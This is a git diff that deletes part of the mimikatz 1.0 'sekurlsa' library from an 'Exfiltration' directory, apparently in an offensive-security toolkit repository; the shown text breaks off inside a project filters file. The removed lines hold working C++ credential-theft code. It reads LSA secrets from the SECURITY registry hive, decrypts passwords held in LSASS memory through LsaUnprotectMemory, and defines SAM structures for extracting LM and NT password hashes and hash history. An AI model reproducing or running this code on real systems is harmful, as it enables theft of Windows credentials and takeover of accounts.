\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.h deleted file mode 100644 index 870aa4d..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/sam.h +++ /dev/null @@ -1,210 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "kmodel.h" -#include "mod_text.h" -#include <sstream> -#include <iomanip> - -bool searchSAMFuncs(); -__kextdll bool __cdecl getSAMFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments); -__kextdll bool __cdecl getLocalAccounts(mod_pipe * monPipe, vector<wstring> * mesArguments); - -#define SAM_SERVER_CONNECT 0x00000001 -#define DOMAIN_ALL_ACCESS 0x000F07FF -#define USER_ALL_ACCESS 0x000F07FF - -#define USER_ACCOUNT_DISABLED 0x00000001 -#define USER_PASSWORD_NOT_REQUIRED 0x00000004 -#define USER_NORMAL_ACCOUNT 0x00000010 -#define USER_WORKSTATION_TRUST_ACCOUNT 0x00000080 -#define USER_SERVER_TRUST_ACCOUNT 0x00000100 -#define USER_DONT_EXPIRE_PASSWORD 0x00000200 -#define USER_ACCOUNT_AUTO_LOCKED 0x00000400 -#define USER_SMARTCARD_REQUIRED 0x00001000 -#define USER_TRUSTED_FOR_DELEGATION 0x00002000 -#define USER_PASSWORD_EXPIRED 0x00020000 - -typedef struct _WUserAllInformation -{ - unsigned long UserId; - wstring UserName; - wstring DomaineName; - wstring FullName; - bool isActif; - bool isLocked; - wstring TypeCompte; - wstring UserComment; - wstring AdminComment; - wstring AccountExpires; - wstring AccountExpires_strict; - wstring WorkStations; - - wstring HomeDirectory; - wstring HomeDirectoryDrive; - wstring ProfilePath; - wstring ScriptPath; - - unsigned short LogonCount; - unsigned short BadPasswordCount; - wstring LastLogon; - wstring LastLogon_strict; - wstring LastLogoff; - wstring LastLogoff_strict; - - wstring PasswordLastSet; - wstring PasswordLastSet_strict; - bool isPasswordNotExpire; - bool isPasswordNotRequired; - bool isPasswordExpired; - wstring PasswordCanChange; - wstring PasswordCanChange_strict; - wstring PasswordMustChange; - wstring PasswordMustChange_strict; - - bool LmPasswordPresent; - wstring LmOwfPassword; - bool NtPasswordPresent; - wstring NtOwfPassword; -} WUserAllInformation, *PUserAllInformation; - -typedef struct _WHashHistory -{ - DWORD unkVersion; - unsigned short currentLMsize; - unsigned short unkCurrentLMsize; - DWORD unkCurLM; - BYTE EncLMhash[16]; - - unsigned short currentNTLMsize; - unsigned short unkCurrentNTLMsize; - DWORD unkCurNTLM; - BYTE EncNTLMhash[16]; - - unsigned short histLMsize; - unsigned short unkhistLMsize; - DWORD unkHistLM; - - unsigned short histNTLMsize; - unsigned short unkhistNTLMsize; - DWORD unkHistNTLM; - BYTE hashs[24][16]; -} WHashHistory, *PWHashHistory; - -DECLARE_HANDLE(HUSER); -DECLARE_HANDLE(HSAM); -DECLARE_HANDLE(HDOMAIN); - -typedef struct _SAMPR_RID_ENUMERATION -{ - unsigned long RelativeId; - LSA_UNICODE_STRING Name; -} SAMPR_RID_ENUMERATION, *PSAMPR_RID_ENUMERATION; - -typedef struct _SAMPR_ENUMERATION_BUFFER -{ - unsigned long EntriesRead; - [size_is(EntriesRead)] PSAMPR_RID_ENUMERATION Buffer; -} SAMPR_ENUMERATION_BUFFER, *PSAMPR_ENUMERATION_BUFFER; - -typedef enum _USER_INFORMATION_CLASS -{ - UserInternal1Information = 18, - UserAllInformation = 21, -} USER_INFORMATION_CLASS, *PUSER_INFORMATION_CLASS; - -typedef struct _ENCRYPTED_LM_OWF_PASSWORD -{ - BYTE data[16]; -} ENCRYPTED_LM_OWF_PASSWORD, *PENCRYPTED_LM_OWF_PASSWORD, ENCRYPTED_NT_OWF_PASSWORD, *PENCRYPTED_NT_OWF_PASSWORD; - -typedef struct _SAMPR_USER_INTERNAL1_INFORMATION -{ - ENCRYPTED_NT_OWF_PASSWORD EncryptedNtOwfPassword; - ENCRYPTED_LM_OWF_PASSWORD EncryptedLmOwfPassword; - unsigned char NtPasswordPresent; - unsigned char LmPasswordPresent; - unsigned char PasswordExpired; -} SAMPR_USER_INTERNAL1_INFORMATION, *PSAMPR_USER_INTERNAL1_INFORMATION; - -typedef struct _OLD_LARGE_INTEGER { - unsigned long LowPart; - long HighPart; -} OLD_LARGE_INTEGER, *POLD_LARGE_INTEGER; - -typedef struct _SAMPR_SR_SECURITY_DESCRIPTOR { - [range(0, 256 * 1024)] unsigned long Length; - [size_is(Length)] unsigned char* SecurityDescriptor; -} SAMPR_SR_SECURITY_DESCRIPTOR, *PSAMPR_SR_SECURITY_DESCRIPTOR; - -typedef struct _SAMPR_LOGON_HOURS { - unsigned short UnitsPerWeek; - [size_is(1260), length_is((UnitsPerWeek+7)/8)] - unsigned char* LogonHours; -} SAMPR_LOGON_HOURS, *PSAMPR_LOGON_HOURS; - -typedef struct _SAMPR_USER_ALL_INFORMATION -{ - OLD_LARGE_INTEGER LastLogon; - OLD_LARGE_INTEGER LastLogoff; - OLD_LARGE_INTEGER PasswordLastSet; - OLD_LARGE_INTEGER AccountExpires; - OLD_LARGE_INTEGER PasswordCanChange; - OLD_LARGE_INTEGER PasswordMustChange; - LSA_UNICODE_STRING UserName; - LSA_UNICODE_STRING FullName; - LSA_UNICODE_STRING HomeDirectory; - LSA_UNICODE_STRING HomeDirectoryDrive; - LSA_UNICODE_STRING ScriptPath; - LSA_UNICODE_STRING ProfilePath; - LSA_UNICODE_STRING AdminComment; - LSA_UNICODE_STRING WorkStations; - LSA_UNICODE_STRING UserComment; - LSA_UNICODE_STRING Parameters; - LSA_UNICODE_STRING LmOwfPassword; - LSA_UNICODE_STRING NtOwfPassword; - LSA_UNICODE_STRING PrivateData; - SAMPR_SR_SECURITY_DESCRIPTOR SecurityDescriptor; - unsigned long UserId; - unsigned long PrimaryGroupId; - unsigned long UserAccountControl; - unsigned long WhichFields; - SAMPR_LOGON_HOURS LogonHours; - unsigned short BadPasswordCount; - unsigned short LogonCount; - unsigned short CountryCode; - unsigned short CodePage; - unsigned char LmPasswordPresent; - unsigned char NtPasswordPresent; - unsigned char PasswordExpired; - unsigned char PrivateDataSensitive; -} SAMPR_USER_ALL_INFORMATION, *PSAMPR_USER_ALL_INFORMATION; - -typedef [switch_is(USER_INFORMATION_CLASS)] union _SAMPR_USER_INFO_BUFFER /* http://msdn.microsoft.com/en-us/library/cc211885.aspx */ -{ - [case(UserInternal1Information)] - SAMPR_USER_INTERNAL1_INFORMATION Internal1; - [case(UserAllInformation)] - SAMPR_USER_ALL_INFORMATION All; -} SAMPR_USER_INFO_BUFFER, *PSAMPR_USER_INFO_BUFFER; - -WUserAllInformation UserInformationsToStruct(USER_INFORMATION_CLASS type, PSAMPR_USER_INFO_BUFFER & monPtr); -bool descrToPipeInformations(mod_pipe * monPipe, USER_INFORMATION_CLASS type, WUserAllInformation & mesInfos, bool isCSV = false); -bool descrUserHistoryToPipe(mod_pipe * monPipe, DWORD rid, wstring monUserName, wstring domainName, HUSER handleUser, USER_INFORMATION_CLASS type, bool isCSV = false); -wstring toTimeFromOLD_LARGE_INTEGER(OLD_LARGE_INTEGER & monInt, bool isStrict = false); -wstring protectMe(wstring &maChaine); -void correctMe(wstring &maChaine); - -typedef NTSTATUS (WINAPI * PSAM_I_CONNECT) (DWORD, HSAM *, DWORD, DWORD); -typedef NTSTATUS (WINAPI * PSAM_R_OPEN_DOMAIN) (HSAM, DWORD dwAccess, PSID, HDOMAIN*); -typedef NTSTATUS (WINAPI * PSAM_R_OPEN_USER) (HDOMAIN, DWORD dwAccess, DWORD, HUSER*); -typedef NTSTATUS (WINAPI * PSAM_R_ENUMERATE_USERS_IN_DOMAIN) (HDOMAIN, DWORD*, DWORD, PSAMPR_ENUMERATION_BUFFER *, DWORD, PVOID); -typedef NTSTATUS (WINAPI * PSAM_R_QUERY_INFORMATION_USER) (HUSER, DWORD, PSAMPR_USER_INFO_BUFFER *); -typedef HLOCAL (WINAPI * PSAM_I_FREE_SAMPR_USER_INFO_BUFFER) (PVOID, DWORD); -typedef HLOCAL (WINAPI * PSAM_I_FREE_SAMPR_ENUMERATION_BUFFER) (PSAMPR_ENUMERATION_BUFFER); -typedef NTSTATUS (WINAPI * PSAM_R_CLOSE_HANDLE) (PHANDLE); -typedef NTSTATUS (WINAPI * PSAM_I_GET_PRIVATE_DATA) (HUSER, DWORD *, DWORD *, DWORD *, PWHashHistory *); diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.cpp deleted file mode 100644 index 06d8664..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.cpp +++ /dev/null @@ -1,99 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "secrets.h" - -PLSA_I_OPEN_POLICY_TRUSTED LsaIOpenPolicyTrusted = NULL; -PLSA_R_OPEN_SECRET LsarOpenSecret = NULL; -PLSA_R_QUERY_SECRET LsarQuerySecret = NULL; -PLSA_R_CLOSE LsarClose = NULL; - -bool searchSECFuncs() -{ - if(!(LsaIOpenPolicyTrusted && LsarOpenSecret && LsarQuerySecret && LsarClose)) - { - if(HMODULE hLsasrv = GetModuleHandle(L"lsasrv")) - { - LsaIOpenPolicyTrusted = reinterpret_cast<PLSA_I_OPEN_POLICY_TRUSTED>(GetProcAddress(hLsasrv, "LsaIOpenPolicyTrusted")); - LsarOpenSecret = reinterpret_cast<PLSA_R_OPEN_SECRET>(GetProcAddress(hLsasrv, "LsarOpenSecret")); - LsarQuerySecret = reinterpret_cast<PLSA_R_QUERY_SECRET>(GetProcAddress(hLsasrv, "LsarQuerySecret")); - LsarClose = reinterpret_cast<PLSA_R_CLOSE>(GetProcAddress(hLsasrv, "LsarClose")); - } - return (LsaIOpenPolicyTrusted && LsarOpenSecret && LsarQuerySecret && LsarClose); - } - else return true; -} - -__kextdll bool __cdecl getSECFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ - wostringstream monStream; - monStream << L"** lsasrv.dll ** ; Statut recherche : " << (searchSECFuncs() ? L"OK :)" : L"KO :(") << endl << endl << - L"@LsaIOpenPolicyTrusted = " << LsaIOpenPolicyTrusted << endl << - L"@LsarOpenSecret = " << LsarOpenSecret << endl << - L"@LsarQuerySecret = " << LsarQuerySecret << endl << - L"@LsarClose = " << LsarClose << endl; - return sendTo(monPipe, monStream.str()); -} - -__kextdll bool __cdecl getSecrets(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ - if(searchSECFuncs()) - { - bool sendOk = true; - wstring message; - LSA_HANDLE hPolicy; - - if(NT_SUCCESS(LsaIOpenPolicyTrusted(&hPolicy))) - { - HKEY hKeysSecrets; - if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SECURITY\\Policy\\Secrets", 0, KEY_READ, &hKeysSecrets) == ERROR_SUCCESS) - { - DWORD nbKey, maxKeySize; - if(RegQueryInfoKey(hKeysSecrets, NULL, NULL, NULL, &nbKey, &maxKeySize, NULL, NULL, NULL, NULL, NULL, NULL) == ERROR_SUCCESS) - { - for(DWORD i = 0; (i < nbKey) && sendOk; i++) - { - DWORD buffsize = (maxKeySize+1) * sizeof(wchar_t); - LSA_UNICODE_STRING monNomSecret = {0, 0, new wchar_t[buffsize]}; - - if(RegEnumKeyEx(hKeysSecrets, i, monNomSecret.Buffer, &buffsize, NULL, NULL, NULL, NULL) == ERROR_SUCCESS) - { - monNomSecret.Length = monNomSecret.MaximumLength = static_cast<USHORT>(buffsize * sizeof(wchar_t)); - message.assign(L"\nSecret : "); message.append(mod_text::stringOfSTRING(monNomSecret)); message.push_back(L'\n'); - - LSA_HANDLE hSecret; - if(NT_SUCCESS(LsarOpenSecret(hPolicy, &monNomSecret, SECRET_QUERY_VALUE, &hSecret))) - { - LSA_SECRET * monSecret = NULL; - if(NT_SUCCESS(LsarQuerySecret(hSecret, &monSecret, NULL, NULL, NULL))) - { - message.append(L"Credential : "); message.append(mod_text::stringOrHex(reinterpret_cast<PBYTE>(monSecret->Buffer), monSecret->Length)); message.push_back(L'\n'); - LsaFreeMemory(monSecret); - } - else message.append(L"Erreur : Impossible de rcuprer le secret\n"); - LsarClose(&hSecret); - } - else message.append(L"Erreur : Impossible d\'ouvrir le secret\n"); - } - delete[] monNomSecret.Buffer; - sendOk = sendTo(monPipe, message); - } - message.clear(); - } else message.assign(L"Erreur : Impossible d\'obtenir des information sur le registre secret\n"); - RegCloseKey(hKeysSecrets); - } - else message.assign(L"Erreur : Impossible d\'ouvrir la cl Secrets\n"); - LsarClose(&hPolicy); - } - else message.assign(L"Erreur : Impossible d\'ouvrir la politique\n"); - - if(!message.empty()) - sendOk = sendTo(monPipe, message); - - return sendOk; - } - else return getSECFunctions(monPipe, mesArguments); -} diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.h deleted file mode 100644 index cb74837..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/secrets.h +++ /dev/null @@ -1,29 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "kmodel.h" -#include "mod_text.h" -#include <wincred.h> - -bool searchSECFuncs(); -__kextdll bool __cdecl getSECFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments); -__kextdll bool __cdecl getSecrets(mod_pipe * monPipe, vector<wstring> * mesArguments); - -#define SECRET_SET_VALUE 0x00000001 -#define SECRET_QUERY_VALUE 0x00000002 - -typedef struct _LSA_SECRET -{ - DWORD Length; - DWORD MaximumLength; - wchar_t * Buffer; -} LSA_SECRET, *PLSA_SECRET; - -typedef NTSTATUS (WINAPI * PLSA_I_OPEN_POLICY_TRUSTED) (LSA_HANDLE * pHPolicy); -typedef NTSTATUS (WINAPI * PLSA_R_OPEN_SECRET) (LSA_HANDLE hPolicy, LSA_UNICODE_STRING *, DWORD dwAccess, LSA_HANDLE * hSecret); -typedef NTSTATUS (WINAPI * PLSA_R_QUERY_SECRET) (LSA_HANDLE hSecret, PLSA_SECRET * ppSecret, PVOID pCurrentValueSetTime, PLSA_UNICODE_STRING * ppOldSecret, PVOID pOldValueSetTime); -typedef NTSTATUS (WINAPI * PLSA_R_CLOSE) (LSA_HANDLE * pHandle); diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.cpp deleted file mode 100644 index 1d07596..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.cpp +++ /dev/null @@ -1,86 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "sekurlsa.h" -PLSA_SECPKG_FUNCTION_TABLE SeckPkgFunctionTable = NULL; - -__kextdll bool __cdecl getDescription(wstring * maDescription) -{ - maDescription->assign(L"SekurLSA : librairie de manipulation des donnes de scurits dans LSASS\n"); - return mod_system::getVersion(&mod_system::GLOB_Version); -} - -bool searchLSAFuncs() -{ - if(!SeckPkgFunctionTable) - { - if(HMODULE hLsasrv = GetModuleHandle(L"lsasrv")) - { - struct {PVOID LsaIRegisterNotification; PVOID LsaICancelNotification;} extractPkgFunctionTable = {GetProcAddress(hLsasrv, "LsaIRegisterNotification"), GetProcAddress(hLsasrv, "LsaICancelNotification")}; - if(extractPkgFunctionTable.LsaIRegisterNotification && extractPkgFunctionTable.LsaICancelNotification) - mod_memory::genericPatternSearch(reinterpret_cast<PBYTE *>(&SeckPkgFunctionTable), L"lsasrv", reinterpret_cast<PBYTE>(&extractPkgFunctionTable), sizeof(extractPkgFunctionTable), - FIELD_OFFSET(LSA_SECPKG_FUNCTION_TABLE, RegisterNotification), NULL, true, true); - } - } - return (SeckPkgFunctionTable != NULL); -} - -wstring getPasswordFromProtectedUnicodeString(LSA_UNICODE_STRING * ptrPass) -{ - wstring password; - if(ptrPass->Buffer && (ptrPass->Length > 0)) - { - BYTE * monPass = new BYTE[ptrPass->MaximumLength]; - RtlCopyMemory(monPass, ptrPass->Buffer, ptrPass->MaximumLength); - SeckPkgFunctionTable->LsaUnprotectMemory(monPass, ptrPass->MaximumLength); - password.assign(mod_text::stringOrHex(reinterpret_cast<PBYTE>(monPass), ptrPass->Length)); - delete[] monPass; - } - return password; -} - -bool getLogonData(mod_pipe * monPipe, vector<wstring> * mesArguments, vector<pair<PFN_ENUM_BY_LUID, wstring>> * mesProviders) -{ - bool sendOk = true; - PLUID sessions; - ULONG count; - - if (NT_SUCCESS(LsaEnumerateLogonSessions(&count, &sessions))) - { - for (ULONG i = 0; i < count && sendOk; i++) - { - PSECURITY_LOGON_SESSION_DATA sessionData = NULL; - if(NT_SUCCESS(LsaGetLogonSessionData(&sessions[i], &sessionData))) - { - if(sessionData->LogonType != Network) - { - wostringstream maPremiereReponse; - maPremiereReponse << endl << - L"Authentification Id : " << sessions[i].HighPart << L";" << sessions[i].LowPart << endl << - L"Package d\'authentification : " << mod_text::stringOfSTRING(sessionData->AuthenticationPackage) << endl << - L"Utilisateur principal : " << mod_text::stringOfSTRING(sessionData->UserName) << endl << - L"Domaine d\'authentification : " << mod_text::stringOfSTRING(sessionData->LogonDomain) << endl; - - sendOk = sendTo(monPipe, maPremiereReponse.str()); - - for(vector<pair<PFN_ENUM_BY_LUID, wstring>>::iterator monProvider = mesProviders->begin(); monProvider != mesProviders->end(); monProvider++) - { - wostringstream maSecondeReponse; - maSecondeReponse << L'\t' << monProvider->second << L" : \t"; - sendOk = sendTo(monPipe, maSecondeReponse.str()); - monProvider->first(&sessions[i], monPipe, mesArguments->empty()); - sendOk = sendTo(monPipe, L"\n"); - } - } - LsaFreeReturnBuffer(sessionData); - } - else sendOk = sendTo(monPipe, L"Erreur : Impossible d\'obtenir les donnes de session\n"); - } - LsaFreeReturnBuffer(sessions); - } - else sendOk = sendTo(monPipe, L"Erreur : Impossible d\'numerer les sessions courantes\n"); - - return sendOk; -} diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.h deleted file mode 100644 index c36e173..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.h +++ /dev/null @@ -1,23 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "kmodel.h" -#include "secpkg.h" -#include "mod_memory.h" -#include "mod_system.h" -#include "mod_text.h" -#include "mod_process.h" - -extern PLSA_SECPKG_FUNCTION_TABLE SeckPkgFunctionTable; - -bool searchLSAFuncs(); -__kextdll bool __cdecl getDescription(wstring * maDescription); - -typedef bool (WINAPI * PFN_ENUM_BY_LUID) (__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity); -bool getLogonData(mod_pipe * monPipe, vector<wstring> * mesArguments, vector<pair<PFN_ENUM_BY_LUID, wstring>> * mesProviders); - -wstring getPasswordFromProtectedUnicodeString(LSA_UNICODE_STRING * ptrPass); diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.rc b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.rc Binary files differdeleted file mode 100644 index 2243435..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.rc +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj deleted file mode 100644 index dbea2a6..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj +++ /dev/null @@ -1,154 +0,0 @@ -<?xml version="1.0" encoding="utf-8"?> -<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> - <ItemGroup Label="ProjectConfigurations"> - <ProjectConfiguration Include="Release|Win32"> - <Configuration>Release</Configuration> - <Platform>Win32</Platform> - </ProjectConfiguration> - <ProjectConfiguration Include="Release|x64"> - <Configuration>Release</Configuration> - <Platform>x64</Platform> - </ProjectConfiguration> - </ItemGroup> - <PropertyGroup Label="Globals"> - <ProjectGuid>{3A436EFD-4FD7-4E5F-B0EC-F9DCCACF1E60}</ProjectGuid> - <Keyword>Win32Proj</Keyword> - <RootNamespace>sekurlsa</RootNamespace> - </PropertyGroup> - <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> - <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> - <ConfigurationType>DynamicLibrary</ConfigurationType> - <UseDebugLibraries>false</UseDebugLibraries> - <WholeProgramOptimization>true</WholeProgramOptimization> - <CharacterSet>Unicode</CharacterSet> - <UseOfMfc>Static</UseOfMfc> - </PropertyGroup> - <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> - <ConfigurationType>DynamicLibrary</ConfigurationType> - <UseDebugLibraries>false</UseDebugLibraries> - <WholeProgramOptimization>true</WholeProgramOptimization> - <CharacterSet>Unicode</CharacterSet> - <UseOfMfc>Static</UseOfMfc> - </PropertyGroup> - <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> - <ImportGroup Label="ExtensionSettings"> - </ImportGroup> - <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> - <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> - </ImportGroup> - <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> - <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> - </ImportGroup> - <PropertyGroup Label="UserMacros" /> - <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> - <LinkIncremental>false</LinkIncremental> - <OutDir>$(SolutionDir)$(Platform)\</OutDir> - <IntDir>$(Platform)\</IntDir> - </PropertyGroup> - <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> - <LinkIncremental>false</LinkIncremental> - <OutDir>$(SolutionDir)$(Platform)\</OutDir> - <IntDir>$(Platform)\</IntDir> - </PropertyGroup> - <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> - <ClCompile> - <WarningLevel>Level3</WarningLevel> - <PrecompiledHeader>NotUsing</PrecompiledHeader> - <Optimization>Full</Optimization> - <FunctionLevelLinking>true</FunctionLevelLinking> - <IntrinsicFunctions>true</IntrinsicFunctions> - <PreprocessorDefinitions>WIN32;NDEBUG;PSAPI_VERSION=1;_WINDOWS;_USRDLL;SEKURLSA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> - <AdditionalIncludeDirectories>$(SolutionDir)/commun;$(SolutionDir)/modules;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> - <FavorSizeOrSpeed>Size</FavorSizeOrSpeed> - <StringPooling>true</StringPooling> - <ExceptionHandling>false</ExceptionHandling> - <FloatingPointModel>Fast</FloatingPointModel> - <FloatingPointExceptions>false</FloatingPointExceptions> - <CreateHotpatchableImage>false</CreateHotpatchableImage> - <ErrorReporting>None</ErrorReporting> - </ClCompile> - <Link> - <SubSystem>Windows</SubSystem> - <GenerateDebugInformation>false</GenerateDebugInformation> - <EnableCOMDATFolding>true</EnableCOMDATFolding> - <OptimizeReferences>true</OptimizeReferences> - <AdditionalDependencies>psapi.lib;secur32.lib;advapi32.lib;shlwapi.lib;%(AdditionalDependencies)</AdditionalDependencies> - <LinkErrorReporting>NoErrorReport</LinkErrorReporting> - <ModuleDefinitionFile> - </ModuleDefinitionFile> - </Link> - <ResourceCompile> - <Culture>0x040c</Culture> - </ResourceCompile> - </ItemDefinitionGroup> - <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> - <ClCompile> - <WarningLevel>Level3</WarningLevel> - <PrecompiledHeader>NotUsing</PrecompiledHeader> - <Optimization>Full</Optimization> - <FunctionLevelLinking>true</FunctionLevelLinking> - <IntrinsicFunctions>true</IntrinsicFunctions> - <PreprocessorDefinitions>WIN32;NDEBUG;PSAPI_VERSION=1;_WINDOWS;_USRDLL;SEKURLSA_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> - <AdditionalIncludeDirectories>$(SolutionDir)/commun;$(SolutionDir)/modules;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> - <FavorSizeOrSpeed>Size</FavorSizeOrSpeed> - <StringPooling>true</StringPooling> - <ExceptionHandling>false</ExceptionHandling> - <FloatingPointModel>Fast</FloatingPointModel> - <FloatingPointExceptions>false</FloatingPointExceptions> - <CreateHotpatchableImage>false</CreateHotpatchableImage> - <ErrorReporting>None</ErrorReporting> - </ClCompile> - <Link> - <SubSystem>Windows</SubSystem> - <GenerateDebugInformation>false</GenerateDebugInformation> - <EnableCOMDATFolding>true</EnableCOMDATFolding> - <OptimizeReferences>true</OptimizeReferences> - <AdditionalDependencies>psapi.lib;secur32.lib;advapi32.lib;shlwapi.lib;%(AdditionalDependencies)</AdditionalDependencies> - <LinkErrorReporting>NoErrorReport</LinkErrorReporting> - <ModuleDefinitionFile> - </ModuleDefinitionFile> - </Link> - <ResourceCompile> - <Culture>0x040c</Culture> - </ResourceCompile> - </ItemDefinitionGroup> - <ItemGroup> - <ClCompile Include="..\..\commun\kmodel.cpp" /> - <ClCompile Include="..\..\modules\mod_memory.cpp" /> - <ClCompile Include="..\..\modules\mod_parseur.cpp" /> - <ClCompile Include="..\..\modules\mod_pipe.cpp" /> - <ClCompile Include="..\..\modules\mod_process.cpp" /> - <ClCompile Include="..\..\modules\mod_system.cpp" /> - <ClCompile Include="..\..\modules\mod_text.cpp" /> - <ClCompile Include="modules\credman.cpp" /> - <ClCompile Include="modules\incognito.cpp" /> - <ClCompile Include="modules\sam.cpp" /> - <ClCompile Include="modules\secrets.cpp" /> - <ClCompile Include="Security Packages\msv1_0.cpp" /> - <ClCompile Include="Security Packages\msv1_0_helper.cpp" /> - <ClCompile Include="sekurlsa.cpp" /> - </ItemGroup> - <ItemGroup> - <ClInclude Include="..\..\commun\kmodel.h" /> - <ClInclude Include="..\..\commun\secpkg.h" /> - <ClInclude Include="..\..\modules\mod_memory.h" /> - <ClInclude Include="..\..\modules\mod_parseur.h" /> - <ClInclude Include="..\..\modules\mod_pipe.h" /> - <ClInclude Include="..\..\modules\mod_process.h" /> - <ClInclude Include="..\..\modules\mod_system.h" /> - <ClInclude Include="..\..\modules\mod_text.h" /> - <ClInclude Include="modules\credman.h" /> - <ClInclude Include="modules\incognito.h" /> - <ClInclude Include="modules\sam.h" /> - <ClInclude Include="modules\secrets.h" /> - <ClInclude Include="Security Packages\msv1_0.h" /> - <ClInclude Include="Security Packages\msv1_0_helper.h" /> - <ClInclude Include="sekurlsa.h" /> - </ItemGroup> - <ItemGroup> - <ResourceCompile Include="sekurlsa.rc" /> - </ItemGroup> - <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> - <ImportGroup Label="ExtensionTargets"> - </ImportGroup> -</Project>
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj.filters b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj.filters deleted file mode 100644 index 936fcde..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.vcxproj.filters +++ /dev/null @@ -1,122 +0,0 @@ -<?xml version="1.0" encoding="utf-8"?> -<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> - <ItemGroup> - <Filter Include="Modules Communs"> - <UniqueIdentifier>{87c9f520-31d1-4b44-a523-415e0c703bde}</UniqueIdentifier> - </Filter> - <Filter Include="Modules Communs\Communication"> - <UniqueIdentifier>{8c6588bf-b3cf-4080-b59e-3ce82a6ccd62}</UniqueIdentifier> - </Filter> - <Filter Include="Modules Communs\Parseur"> - <UniqueIdentifier>{9e44771d-18f4-407a-8f89-508cf5c366ff}</UniqueIdentifier> - </Filter> - <Filter Include="Modules Communs\Librairie Modèle"> - <UniqueIdentifier>{541a9eff-641d-4a77-9b1f-e72ad6a7c0fa}</UniqueIdentifier> - </Filter> - <Filter Include="Modules Communs\Mémoire"> - <UniqueIdentifier>{ba6b07a5-6d5b-4632-ad6e-56690630eaa7}</UniqueIdentifier> - </Filter> - <Filter Include="Security Packages"> - 